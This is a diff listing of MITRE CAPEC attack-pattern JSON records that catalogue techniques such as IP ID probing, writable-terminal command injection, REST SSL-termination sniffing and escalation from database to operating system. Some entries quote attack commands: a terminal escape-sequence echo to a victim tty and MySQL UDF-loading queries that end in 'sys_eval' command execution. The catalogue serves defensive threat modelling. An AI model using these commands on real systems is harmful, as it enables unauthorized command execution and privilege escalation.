+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/200.html"
18
+ },
19
+ {
20
+ "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill",
21
+ "external_id": "REF-33",
22
+ "source_name": "reference_from_CAPEC"
23
+ },
24
+ {
25
+ "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)",
26
+ "external_id": "REF-128",
27
+ "source_name": "reference_from_CAPEC",
28
+ "url": "http://www.faqs.org/rfcs/rfc793.html"
29
+ },
30
+ {
31
+ "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC",
32
+ "external_id": "REF-212",
33
+ "source_name": "reference_from_CAPEC"
34
+ },
35
+ {
36
+ "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997",
37
+ "external_id": "REF-130",
38
+ "source_name": "reference_from_CAPEC",
39
+ "url": "http://phrack.org/issues/51/11.html"
40
+ }
41
+ ],
42
+ "id": "attack-pattern--3190ba0e-d2d1-4007-985d-5f3aa517aaed",
43
+ "modified": "2018-07-31T00:00:00.000Z",
44
+ "name": "IP ID Sequencing Probe",
45
+ "object_marking_refs": [
46
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
47
+ ],
48
+ "type": "attack-pattern",
49
+ "x_capec_abstraction": "Detailed",
50
+ "x_capec_child_of_refs": [
51
+ "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617"
52
+ ],
53
+ "x_capec_consequences": {
54
+ "Access_Control": [
55
+ "Bypass Protection Mechanism",
56
+ "Hide Activities"
57
+ ],
58
+ "Authorization": [
59
+ "Bypass Protection Mechanism",
60
+ "Hide Activities"
61
+ ],
62
+ "Confidentiality": [
63
+ "Read Data",
64
+ "Bypass Protection Mechanism",
65
+ "Hide Activities"
66
+ ]
67
+ },
68
+ "x_capec_domains": [
69
+ "Software"
70
+ ],
71
+ "x_capec_likelihood_of_attack": "Medium",
72
+ "x_capec_status": "Stable",
73
+ "x_capec_typical_severity": "Low",
74
+ "x_capec_version": "3.9"
75
+ }
76
+ ],
77
+ "spec_version": "2.0",
78
+ "type": "bundle"
79
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--31b90554-68d8-4950-ac45-89c915a30716.json ADDED
@@ -0,0 +1,57 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--32234d30-c8e6-4f09-b0b5-2285f9f78ec4",
3
+ "objects": [
4
+ {
5
+ "created": "2015-11-09T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "\n <xhtml:p>An adversary modifies file contents by adding data to files for several reasons. Many different attacks could “follow” this pattern resulting in numerous outcomes. Adding data to a file could also result in a Denial of Service condition for devices with limited storage capacity.</xhtml:p>\n ",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-572",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/572.html"
13
+ },
14
+ {
15
+ "description": "Obfuscated Files or Information:Binary Padding",
16
+ "external_id": "T1027.001",
17
+ "source_name": "ATTACK",
18
+ "url": "https://attack.mitre.org/wiki/Technique/T1027/001"
19
+ }
20
+ ],
21
+ "id": "attack-pattern--31b90554-68d8-4950-ac45-89c915a30716",
22
+ "modified": "2021-06-24T00:00:00.000Z",
23
+ "name": "Artificially Inflate File Sizes",
24
+ "object_marking_refs": [
25
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
26
+ ],
27
+ "type": "attack-pattern",
28
+ "x_capec_abstraction": "Standard",
29
+ "x_capec_child_of_refs": [
30
+ "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3"
31
+ ],
32
+ "x_capec_consequences": {
33
+ "Availability": [
34
+ "Resource Consumption (Denial of Service)"
35
+ ],
36
+ "Integrity": [
37
+ "Modify Data"
38
+ ]
39
+ },
40
+ "x_capec_domains": [
41
+ "Software"
42
+ ],
43
+ "x_capec_example_instances": [
44
+ "\n <xhtml:p>An adversary could potentially increase file sizes on devices containing limited storage resources, such as SCADA or IOT devices, resulting in denial of service conditions.</xhtml:p>\n "
45
+ ],
46
+ "x_capec_likelihood_of_attack": "High",
47
+ "x_capec_parent_of_refs": [
48
+ "attack-pattern--cbe9fd1f-4b5d-4a3c-b20b-e49888457338"
49
+ ],
50
+ "x_capec_status": "Draft",
51
+ "x_capec_typical_severity": "Medium",
52
+ "x_capec_version": "3.9"
53
+ }
54
+ ],
55
+ "spec_version": "2.0",
56
+ "type": "bundle"
57
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--323ed142-7793-413d-838f-72626caf58da.json ADDED
@@ -0,0 +1,59 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--31ee1ed9-dd9c-4aa4-830a-32a8a10def5e",
3
+ "objects": [
4
+ {
5
+ "created": "2019-09-30T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An adversary engages in probing and exploration activities to determine if common key files exists. Such files often contain configuration and security parameters of the targeted application, system or network. Using this knowledge may often pave the way for more damaging attacks.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-497",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/497.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-200",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/200.html"
18
+ },
19
+ {
20
+ "description": "File and Directory Discovery",
21
+ "external_id": "T1083",
22
+ "source_name": "ATTACK",
23
+ "url": "https://attack.mitre.org/wiki/Technique/T1083"
24
+ }
25
+ ],
26
+ "id": "attack-pattern--323ed142-7793-413d-838f-72626caf58da",
27
+ "modified": "2020-12-17T00:00:00.000Z",
28
+ "name": "File Discovery",
29
+ "object_marking_refs": [
30
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
31
+ ],
32
+ "type": "attack-pattern",
33
+ "x_capec_abstraction": "Standard",
34
+ "x_capec_child_of_refs": [
35
+ "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30"
36
+ ],
37
+ "x_capec_consequences": {
38
+ "Confidentiality": [
39
+ "Read Data"
40
+ ]
41
+ },
42
+ "x_capec_domains": [
43
+ "Software"
44
+ ],
45
+ "x_capec_likelihood_of_attack": "High",
46
+ "x_capec_parent_of_refs": [
47
+ "attack-pattern--bddd2549-167f-4f7b-8d0f-6d1e647b26f6"
48
+ ],
49
+ "x_capec_prerequisites": [
50
+ "The adversary must know the location of these common key files."
51
+ ],
52
+ "x_capec_status": "Draft",
53
+ "x_capec_typical_severity": "Very Low",
54
+ "x_capec_version": "3.9"
55
+ }
56
+ ],
57
+ "spec_version": "2.0",
58
+ "type": "bundle"
59
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--326dfb79-2d81-406a-9977-79e67d8de6e2.json ADDED
@@ -0,0 +1,79 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--f6a68e33-dfd8-4443-9e01-5a1fb2de938e",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "This attack exploits terminal devices that allow themselves to be written to by other users. The attacker sends command strings to the target terminal device hoping that the target user will hit enter and thereby execute the malicious command with their privileges. The attacker can send the results (such as copying /etc/passwd) to a known directory and collect once the attack has succeeded.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-40",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/40.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-77",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/77.html"
18
+ },
19
+ {
20
+ "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley",
21
+ "external_id": "REF-1",
22
+ "source_name": "reference_from_CAPEC"
23
+ }
24
+ ],
25
+ "id": "attack-pattern--326dfb79-2d81-406a-9977-79e67d8de6e2",
26
+ "modified": "2022-09-29T00:00:00.000Z",
27
+ "name": "Manipulating Writeable Terminal Devices",
28
+ "object_marking_refs": [
29
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
30
+ ],
31
+ "type": "attack-pattern",
32
+ "x_capec_abstraction": "Standard",
33
+ "x_capec_child_of_refs": [
34
+ "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f"
35
+ ],
36
+ "x_capec_consequences": {
37
+ "Access_Control": [
38
+ "Gain Privileges"
39
+ ],
40
+ "Authorization": [
41
+ "Gain Privileges"
42
+ ],
43
+ "Availability": [
44
+ "Execute Unauthorized Commands (Run Arbitrary Code)"
45
+ ],
46
+ "Confidentiality": [
47
+ "Gain Privileges",
48
+ "Read Data",
49
+ "Execute Unauthorized Commands (Run Arbitrary Code)"
50
+ ],
51
+ "Integrity": [
52
+ "Execute Unauthorized Commands (Run Arbitrary Code)"
53
+ ]
54
+ },
55
+ "x_capec_domains": [
56
+ "Software"
57
+ ],
58
+ "x_capec_example_instances": [
59
+ "\n <xhtml:p>\"Any system that allows other peers to write directly to its terminal process is vulnerable to this type of attack. If the terminals are available through being over-privileged (i.e. world-writable) or the attacker is an administrator, then a series of commands in this format can be used to echo commands out to victim terminals.</xhtml:p>\n <xhtml:div style=\"margin-left:1em;\" class=\"informative\">\"$echo -e \"\\033[30m\\033\\132\" > /dev/ttyXX</xhtml:div>\n <xhtml:p>where XX is the tty number of the user under attack. This will paste the characters to another terminal (tty). Note this technique works only if the victim's tty is world writable (which it may not be). That is one reason why programs like write(1) and talk(1) in UNIX systems need to run setuid.\" [REF-1]</xhtml:p>\n <xhtml:p>If the victim continues to hit \"enter\" and execute the commands, there are an endless supply of vectors available to the attacker, copying files, open up network connections, ftp out to servers, and so on.</xhtml:p>\n "
60
+ ],
61
+ "x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Identify attacker-writable terminals: </b>Determine if users TTYs are writable by the attacker.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Determine the permissions for the TTYs found on the system. Any that allow user write to the TTY may be vulnerable.</td></tr><tr><td>Attempt to write to other user TTYs. This approach could leave a trail or alert a user.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Execute malicious commands: </b>Using one or more vulnerable TTY, execute commands to achieve various impacts.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Commands that allow reading or writing end user files can be executed.</td></tr></tbody></table></ol></div>",
62
+ "x_capec_likelihood_of_attack": "High",
63
+ "x_capec_prerequisites": [
64
+ "User terminals must have a permissive access control such as world writeable that allows normal users to control data on other user's terminals."
65
+ ],
66
+ "x_capec_resources_required": [
67
+ "Access to a terminal on the target network"
68
+ ],
69
+ "x_capec_skills_required": {
70
+ "Low": "Ability to discover permissions on terminal devices. Of course, brute force can also be used."
71
+ },
72
+ "x_capec_status": "Draft",
73
+ "x_capec_typical_severity": "Very High",
74
+ "x_capec_version": "3.9"
75
+ }
76
+ ],
77
+ "spec_version": "2.0",
78
+ "type": "bundle"
79
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--33370ee8-a290-42cc-b85d-5fd13f1f6fed.json ADDED
@@ -0,0 +1,53 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--6f58007f-7785-4951-99da-65eaeba256ee",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, spam-like content, or links to the attackers' code. In general, content-spoofing within an application API can be employed to stage many different types of attacks varied based on the attackers' intent. The techniques require use of specialized software that allow the attacker to use adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-389",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/389.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-353",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/353.html"
18
+ },
19
+ {
20
+ "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18",
21
+ "external_id": "REF-327",
22
+ "source_name": "reference_from_CAPEC"
23
+ }
24
+ ],
25
+ "id": "attack-pattern--33370ee8-a290-42cc-b85d-5fd13f1f6fed",
26
+ "modified": "2021-06-24T00:00:00.000Z",
27
+ "name": "Content Spoofing Via Application API Manipulation",
28
+ "object_marking_refs": [
29
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
30
+ ],
31
+ "type": "attack-pattern",
32
+ "x_capec_abstraction": "Detailed",
33
+ "x_capec_child_of_refs": [
34
+ "attack-pattern--ea07b1ea-c1b0-4923-8d25-a8fc39da040a"
35
+ ],
36
+ "x_capec_domains": [
37
+ "Communications",
38
+ "Software"
39
+ ],
40
+ "x_capec_prerequisites": [
41
+ "Targeted software is utilizing application framework APIs"
42
+ ],
43
+ "x_capec_resources_required": [
44
+ "A software program that allows the use of adversary-in-the-middle communications between the client and server, such as an adversary-in-the-middle proxy."
45
+ ],
46
+ "x_capec_status": "Draft",
47
+ "x_capec_typical_severity": "Low",
48
+ "x_capec_version": "3.9"
49
+ }
50
+ ],
51
+ "spec_version": "2.0",
52
+ "type": "bundle"
53
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--33d398f3-dd5f-4e9f-ba4b-5ed8f189a78d.json ADDED
@@ -0,0 +1,29 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--5ff67e13-4f66-43ad-a494-ee30fed4d2a1",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-65 : Sniff Application Code\". Please refer to this other CAPEC going forward.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-258",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/258.html"
13
+ }
14
+ ],
15
+ "id": "attack-pattern--33d398f3-dd5f-4e9f-ba4b-5ed8f189a78d",
16
+ "modified": "2017-08-04T00:00:00.000Z",
17
+ "name": "DEPRECATED: Passively Sniffing and Capturing Application Code Bound for an Authorized Client During Dynamic Update",
18
+ "object_marking_refs": [
19
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
20
+ ],
21
+ "type": "attack-pattern",
22
+ "x_capec_abstraction": "Detailed",
23
+ "x_capec_status": "Deprecated",
24
+ "x_capec_version": "3.9"
25
+ }
26
+ ],
27
+ "spec_version": "2.0",
28
+ "type": "bundle"
29
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--346d34f3-13e5-4d95-8e96-4b381e76e132.json ADDED
@@ -0,0 +1,60 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--fa7899ed-63a3-40ce-926c-96ed9923a697",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "The adversary incites a behavior from the target by manipulating something of influence. This is commonly associated with financial, social, or ideological incentivization. Examples include monetary fraud, peer pressure, and preying on the target's morals or ethics. The most effective incentive against one target might not be as effective against another, therefore the adversary must gather information about the target's vulnerability to particular incentives.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-426",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/426.html"
13
+ },
14
+ {
15
+ "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC",
16
+ "external_id": "REF-348",
17
+ "source_name": "reference_from_CAPEC",
18
+ "url": "http://www.social-engineer.org"
19
+ }
20
+ ],
21
+ "id": "attack-pattern--346d34f3-13e5-4d95-8e96-4b381e76e132",
22
+ "modified": "2017-08-04T00:00:00.000Z",
23
+ "name": "Influence via Incentives",
24
+ "object_marking_refs": [
25
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
26
+ ],
27
+ "type": "attack-pattern",
28
+ "x_capec_abstraction": "Standard",
29
+ "x_capec_child_of_refs": [
30
+ "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854"
31
+ ],
32
+ "x_capec_consequences": {
33
+ "Availability": [
34
+ "Other (Attacks that successfully incentivize the target into performing an action beneficial to the adversary can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)"
35
+ ],
36
+ "Confidentiality": [
37
+ "Other (Attacks that successfully incentivize the target into performing an action beneficial to the adversary can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)"
38
+ ],
39
+ "Integrity": [
40
+ "Other (Attacks that successfully incentivize the target into performing an action beneficial to the adversary can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)"
41
+ ]
42
+ },
43
+ "x_capec_domains": [
44
+ "Social Engineering"
45
+ ],
46
+ "x_capec_likelihood_of_attack": "Low",
47
+ "x_capec_prerequisites": [
48
+ "The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the incentives that would influence the actions of the specific target."
49
+ ],
50
+ "x_capec_skills_required": {
51
+ "Low": "The adversary requires strong inter-personal and communication skills."
52
+ },
53
+ "x_capec_status": "Stable",
54
+ "x_capec_typical_severity": "Low",
55
+ "x_capec_version": "3.9"
56
+ }
57
+ ],
58
+ "spec_version": "2.0",
59
+ "type": "bundle"
60
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--359d056e-6d5c-4d54-97d6-5a9f586bcccf.json ADDED
@@ -0,0 +1,82 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--da7d6ef3-dbac-47e0-9a0c-14e9bde2eeb5",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "This attack utilizes a REST(REpresentational State Transfer)-style applications' trust in the system resources and environment to obtain sensitive data once SSL is terminated.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-57",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/57.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-300",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/300.html"
18
+ },
19
+ {
20
+ "external_id": "CWE-287",
21
+ "source_name": "cwe",
22
+ "url": "http://cwe.mitre.org/data/definitions/287.html"
23
+ },
24
+ {
25
+ "external_id": "CWE-693",
26
+ "source_name": "cwe",
27
+ "url": "http://cwe.mitre.org/data/definitions/693.html"
28
+ },
29
+ {
30
+ "description": "Network Sniffing",
31
+ "external_id": "T1040",
32
+ "source_name": "ATTACK",
33
+ "url": "https://attack.mitre.org/wiki/Technique/T1040"
34
+ }
35
+ ],
36
+ "id": "attack-pattern--359d056e-6d5c-4d54-97d6-5a9f586bcccf",
37
+ "modified": "2022-09-29T00:00:00.000Z",
38
+ "name": "Utilizing REST's Trust in the System Resource to Obtain Sensitive Data",
39
+ "object_marking_refs": [
40
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
41
+ ],
42
+ "type": "attack-pattern",
43
+ "x_capec_abstraction": "Detailed",
44
+ "x_capec_child_of_refs": [
45
+ "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec"
46
+ ],
47
+ "x_capec_consequences": {
48
+ "Access_Control": [
49
+ "Gain Privileges"
50
+ ],
51
+ "Authorization": [
52
+ "Gain Privileges"
53
+ ],
54
+ "Confidentiality": [
55
+ "Gain Privileges"
56
+ ]
57
+ },
58
+ "x_capec_domains": [
59
+ "Communications",
60
+ "Software"
61
+ ],
62
+ "x_capec_example_instances": [
63
+ "The Rest service provider uses SSL to protect the communications between the service requester (client) to the service provider. In the instance where SSL is terminated before the communications reach the web server, it is very common in enterprise data centers to terminate SSL at a router, firewall, load balancer, proxy or other device, then the adversary can insert a sniffer into the communication stream and gather all the authentication tokens (such as session credentials, username/passwords combinations, and so on). The Rest service requester and service provider do not have any way to detect this attack."
64
+ ],
65
+ "x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Find a REST-style application that uses SSL: </b>The adversary must first find a REST-style application that uses SSL to target. Because this attack is easier to carry out from inside of a server network, it is likely that an adversary could have inside knowledge of how services operate.</p></li></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Insert a listener to sniff client-server communication: </b>The adversary inserts a listener that must exist beyond the point where SSL is terminated. This can be placed on the client side if it is believed that sensitive information is being sent to the client as a response, although most often the listener will be placed on the server side to listen for client authentication information.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Run wireshark or tcpdump on a device that is on the inside of a firewall, load balancer, or router of a network and capture traffic after SSL has been terminated</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Gather information passed in the clear: </b>If developers have not hashed or encrypted data sent in the sniffed request, the adversary will be able to read this data in the clear. Most commonly, they will now have a username or password that they can use to submit requests to the web service just as an authorized user</p></li></ol></div>",
66
+ "x_capec_extended_description": "\n <xhtml:p>Rest applications premise is that they leverage existing infrastructure to deliver web services functionality. An example of this is a Rest application that uses HTTP Get methods and receives a HTTP response with an XML document. These Rest style web services are deployed on existing infrastructure such as Apache and IIS web servers with no SOAP stack required.</xhtml:p>\n <xhtml:p>Unfortunately from a security standpoint, there frequently is no interoperable identity security mechanism deployed, so Rest developers often fall back to SSL to deliver security. In large data centers, SSL is typically terminated at the edge of the network - at the firewall, load balancer, or router. Once the SSL is terminated the HTTP request is in the clear (unless developers have hashed or encrypted the values, but this is rare). The adversary can utilize a sniffer such as Wireshark to snapshot the credentials, such as username and password that are passed in the clear once SSL is terminated. Once the adversary gathers these credentials, they can submit requests to the web service provider just as authorized user do. There is not typically an authentication on the client side, beyond what is passed in the request itself so once this is compromised, then this is generally sufficient to compromise the service's authentication scheme.</xhtml:p>\n ",
67
+ "x_capec_likelihood_of_attack": "Medium",
68
+ "x_capec_prerequisites": [
69
+ "Opportunity to intercept must exist beyond the point where SSL is terminated.",
70
+ "The adversary must be able to insert a listener actively (proxying the communication) or passively (sniffing the communication) in the client-server communication path."
71
+ ],
72
+ "x_capec_skills_required": {
73
+ "Low": "To insert a network sniffer or other listener into the communication stream"
74
+ },
75
+ "x_capec_status": "Draft",
76
+ "x_capec_typical_severity": "Very High",
77
+ "x_capec_version": "3.9"
78
+ }
79
+ ],
80
+ "spec_version": "2.0",
81
+ "type": "bundle"
82
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e.json ADDED
@@ -0,0 +1,59 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--32d228e4-324b-4e0c-88b1-bafe065b60b8",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An attacker is able to leverage access gained to the database to read / write data to the file system, compromise the operating system, create a tunnel for accessing the host machine, and use this access to potentially attack other machines on the same network as the database machine. Traditionally SQL injections attacks are viewed as a way to gain unauthorized read access to the data stored in the database, modify the data in the database, delete the data, etc. However, almost every data base management system (DBMS) system includes facilities that if compromised allow an attacker complete access to the file system, operating system, and full access to the host running the database. The attacker can then use this privileged access to launch subsequent attacks. These facilities include dropping into a command shell, creating user defined functions that can call system level libraries present on the host machine, stored procedures, etc.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-470",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/470.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-250",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/250.html"
18
+ },
19
+ {
20
+ "external_id": "CWE-89",
21
+ "source_name": "cwe",
22
+ "url": "http://cwe.mitre.org/data/definitions/89.html"
23
+ },
24
+ {
25
+ "description": "Bernardo Damele Assump ção Guimarães, Advanced SQL Injection to Operating System Full Control, 2009--04---10",
26
+ "external_id": "REF-408",
27
+ "source_name": "reference_from_CAPEC",
28
+ "url": "http://www.blackhat.com/presentations/bh-europe-09/Guimaraes/Blackhat-europe-09-Damele-SQLInjection-whitepaper.pdf"
29
+ }
30
+ ],
31
+ "id": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e",
32
+ "modified": "2020-12-17T00:00:00.000Z",
33
+ "name": "Expanding Control over the Operating System from the Database",
34
+ "object_marking_refs": [
35
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
36
+ ],
37
+ "type": "attack-pattern",
38
+ "x_capec_abstraction": "Detailed",
39
+ "x_capec_child_of_refs": [
40
+ "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e"
41
+ ],
42
+ "x_capec_domains": [
43
+ "Software"
44
+ ],
45
+ "x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p>The adversary identifies a database management system running on a machine they would like to gain control over, or on a network they want to move laterally through.</p></li></ol></div><div><h3>Experiment</h3><ol><li> <p>The adversary goes about the typical steps of an SQL injection and determines if an injection is possible.</p></li><li> <p>Once the Adversary determines that an SQL injection is possible, they must ensure that the requirements for the attack are met. These are a high privileged session user and batched query support. This is done in similar ways to discovering if an SQL injection is possible.</p></li><li> <p>If the requirements are met, based on the database management system that is running, the adversary will find or create user defined functions (UDFs) that can be loaded as DLLs. An example of a DLL can be found at https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql</p></li><li> <p>In order to load the DLL, the adversary must first find the path to the plugin directory. The command to achieve this is different based on the type of DBMS, but for MySQL, this can be achieved by running the command \"select @@plugin_dir\"</p></li></ol></div><div><h3>Exploit</h3><ol><li> <p>The DLL is then moved into the previously found plugin directory so that the contained functions can be loaded. This can be done in a number of ways; loading from a network share, writing the entire hex encoded string to a file in the plugin directory, or loading the DLL into a table and then into a file. An example using MySQL to load the hex string is as follows. select 0x4d5a9000... into dump file \"{plugin directory}\\\\udf.dll\";</p></li><li> <p>Once the DLL is in the plugin directory, a command is then run to load the UDFs. An example of this in MySQL is \"create function sys_eval returns string soname 'udf.dll';\" The function sys_eval is specific to the example DLL listed above.</p></li><li> <p>Once the adversary has loaded the desired function(s), they will use these to execute arbitrary commands on the compromised system. This is done through a simple select command to the loaded UDF. For example: \"select sys_eval('dir');\". Because the prerequisite to this attack is that the database session user is a super user, this means that the adversary will be able to execute commands with elevated privileges.</p></li></ol></div>",
46
+ "x_capec_prerequisites": [
47
+ "A vulnerable DBMS is usedA SQL injection exists that gives an attacker access to the database or an attacker has access to the DBMS via other means"
48
+ ],
49
+ "x_capec_skills_required": {
50
+ "High": "Low level knowledge of the various facilities available in different DBMS systems for interacting with the file system and operating system"
51
+ },
52
+ "x_capec_status": "Draft",
53
+ "x_capec_typical_severity": "Very High",
54
+ "x_capec_version": "3.9"
55
+ }
56
+ ],
57
